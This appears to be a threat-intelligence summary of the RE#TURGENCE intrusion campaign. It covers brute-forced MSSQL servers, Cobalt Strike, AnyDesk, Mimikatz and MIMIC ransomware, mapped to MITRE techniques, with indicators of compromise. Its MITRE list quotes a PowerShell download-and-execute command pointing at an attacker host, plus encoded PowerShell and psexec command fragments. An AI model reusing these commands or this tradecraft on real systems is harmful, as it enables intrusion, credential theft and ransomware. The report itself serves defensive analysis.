Keypoints
- Threat campaign RE#TURGENCE targeted exposed MSSQL servers via brute force to gain initial access.
- Attackers enabled/used xp_cmdshell to run encoded PowerShell that downloaded payloads from 88.214.26[.]3.
- PowerShell stages loaded a heavily obfuscated Cobalt Strike beacon configured to inject into SndVol.exe and beacon to seruvadessigen.3utilities[.]com.
- Operators deployed AnyDesk via a mounted SMB share (45.148.121[.]87), created a local admin user (username “windows”, password “denek1010”), and shifted to interactive remote control.
- Credential theft used Mimikatz (automated via start.bat and registry tweaks to enable clear-text/WDigest), then psexec with dumped domain admin credentials for lateral movement to a domain controller.
- MIMIC ransomware was manually deployed (red25.exe → red.exe), dropped Everything binaries to enumerate targets, and executed with arguments like -e ul1/ul2/watch to encrypt domain hosts.
MITRE Techniques
- [T1110] Brute Force – Used to gain initial access to exposed MSSQL servers. (‘the threat actors were able to brute force their way into the victim server’)
- [T1505.001] SQL Stored Procedures – Abuse of xp_cmdshell to execute system commands from sqlservr.exe. (‘leveraged the use of the xp_cmdshell procedure to execute commands on the host.’)
- [T1105] Ingress Tool Transfer – Downloaded PowerShell stages and binaries via HTTP from 88.214.26[.]3 and SMB shares. (‘iex((New-Object System.Net.Webclient).DownloadString(‘hxxp://88.214.26[.]3:25823/189Jt’))’)
- [T1059.001 (Execution: PowerShell)] Execution – Encoded PowerShell invoked to retrieve and execute additional stages. (‘powershell -exec bypass -w 1 -e …’)
- [T1055] Process Injection (Cobalt Strike) – Cobalt Strike payload loaded via in-memory reflection and injected into SndVol.exe. (‘the Cobalt Strike beacon is configured to inject into the Windows-native process SndVol.exe’)
- [T1219] Remote Access Software – AnyDesk installed and used for interactive access and file transfer. (‘install the AnyDesk connector service… prints the AnyConnect client ID’)
- [T1003] OS Credential Dumping – Mimikatz executed to dump credentials and save outputs to Mimikatz_dump.txt. (‘download Mimikatz… The results of the Mimikatz dump are then saved into the Mimikatz_dump.txt file.’)
- [T1046] Network Service Discovery – Advanced Port Scanner used to enumerate remote shares, test RDP, and discover domain controllers/jumphosts. (‘Check domain controller remote shares… Test for the usage of RDP connecting to DC’)
- [T1077/T1021 (Lateral Movement via psexec)] Lateral Movement – psexec used to execute cmd.exe on a domain controller using dumped DA credentials. (‘c:psexec.exe -u [REDACTED_DOMAIN][REDACTED_USER] -p [REDACTED_PASS] [REDACTED_IP] cmd.exe’)
- [T1486] Data Encrypted for Impact – MIMIC ransomware (red.exe) executed to encrypt files using Everything binaries for file enumeration and left a payment notice. (‘—IMPORTANT—NOTICE—.txt’)
- [T1112] Modify Registry – Registry tweak applied to enable clear text credentials for credential dumping. (‘uses a known registry tweak to enable clear text credentials’)
Indicators of Compromise
- [IP Address] C2 and payload hosting – 45.148.121[.]87 (SMB payloads/AnyDesk share), 88.214.26[.]3 (PowerShell payloads)
- [Domain] Cobalt Strike beacon – seruvadessigen.3utilities[.]com (beacon URL from Cobalt Strike config)
- [File names] Deployed/observed files – ad.bat (AnyDesk installer script), red25.exe/red.exe (MIMIC dropper and ransomware)
- [File hashes] Observed sample hashes – ad.bat: 9F3AD476EDA12875…AD3D3, red.exe: D6CD0080D401BE8A9…49DC4, and 5 more hashes
The technical kill chain began with brute forcing exposed MSSQL instances, enabling xp_cmdshell, and executing an encoded PowerShell command from sqlservr.exe to fetch stage1 from hxxp://88.214.26[.]3:25823/189Jt. That initial script fetched and executed a second PowerShell stage (hxxp://88.214.26[.]3:25823/MSjku) which contained an obfuscated Cobalt Strike payload; the extracted beacon configuration shows HTTPS beaconing to seruvadessigen.3utilities.com and process injection targeted at SndVol.exe.
After establishing foothold via Cobalt Strike, operators used SMB to mount a remote share on 45.148.121[.]87, copied AnyDesk (ad.exe) and an installer script (ad.bat), created a local administrative account (username “windows”, password “denek1010”), and installed AnyDesk for hands-on control. Via AnyDesk they transferred Mimikatz (into c:userswindowsdesktopx64) and an automation batch (start.bat) that enabled clear-text/WDigest registry settings, ran credential dumps, and saved results to Mimikatz_dump.txt for credential harvesting.
Using credentials harvested and network discovery via Advanced Port Scanner (advport.exe), the actors moved laterally with psexec to a domain controller and other hosts, then manually deployed MIMIC: red25.exe (self-extracting) dropped Everything binaries and red.exe, which ran with arguments like -e ul1/ul2/watch to enumerate and encrypt files across the domain, producing the payment note “—IMPORTANT—NOTICE—.txt”. The observed timeline from initial MSSQL access to domain-wide MIMIC execution was approximately one month.